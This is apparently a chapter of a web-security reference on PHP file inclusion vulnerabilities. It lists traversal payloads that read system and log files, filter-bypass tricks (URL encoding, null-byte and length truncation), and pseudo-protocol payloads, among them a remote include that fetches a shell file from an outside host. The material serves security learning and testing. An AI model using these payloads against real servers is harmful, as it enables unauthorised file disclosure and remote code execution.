4.9. File Include

4.9.1. Basic

Common files contain vulnerabilities in the form of <?php include("inc/" . $_GET['file']); ?>

Consider several commonly used inclusion methods as:

• The same directory contains file=.htaccess

• directory traversal ?file=../../../../../../../../../var/lib/locate.db

• log injection ?file=../../../../../../../../../var/log/apache/error.log

• use /proc/self/environ

The logs can be tested using various log sources such as SSH logs or Web logs.

4.9.2. Triggering Sink

• PHP

  • include

    • If an error occurs during the inclusion process, an error will be reported, which will not affect the execution of subsequent statements.

  • include_once

    • contains only once

  • require

    • If an error occurs during the include process, it will exit directly without executing subsequent statements

  • require_once

4.9.3. Bypass Techniques

Common applications may call a function to judge the file before it is included. Generally, there are several bypass methods as follows:

4.9.3.1. url encoding bypass

If there is a string match in the WAF, you can use the url encoding method to bypass the

4.9.3.2. Special Character Bypass

• In some cases, reading files supports the use of shell wildcards, such as ? * etc.

• In url use ? # may affect the result of include

• In some cases, characters with different unicode encodings but similar glyphs have the same effect

4.9.3.3. %00 truncation

Almost the most common method, provided that it is magic_quotes_gpc closed and the php version is less than 5.3.4.

4.9.3.4. Length truncation

The filename length on Windows is related to the filepath. The specific relationship is: Calculated from the root directory, the maximum length of the file path is 259 bytes.

msdn define #define MAX_PATH 260，the 260th character is the end of with \0. but linux can use getconf to determine the file name length limit and file path length limit。

Get the longest file path length: getconf PATH_MAX /root get 4096 Get the longest file name: getconf NAME_MAX /root get 255

Then when the length is limited,``././././`` (n) form can explode the path

In php code includes, this bypass requires php version < php 5.2.8

4.9.3.5. Fake Protocol Bypass

• Remote include: requires allow_url_fopen=On and allow_url_include=On ， payload is like ?file=[http|https|ftp]://websec.wordpress.com/shell.txt

• PHP input: put the payload in the POST parameter as an included file, request allow_url_include=On ，payload is like ?file=php://input

• Base64: Read the file using the Base64 pseudo-protocol, the payload is like ?file=php://filter/convert.base64-encode/resource=index.php

• data: use the data pseudo-protocol to read the file, the payload is like ?file=data://text/plain;base64,SSBsb3ZlIFBIUAo= ，require allow_url_include=On

4.9.3.6. Protocol Bypass

allow_url_fopen and allow_url_include mainly works for two protocols http ftp，so you can use SMB, WebDav etc. protocols to bypass restrictions.

4.9.4. Reference Links

• Exploit with PHP Protocols

• lfi cheat sheet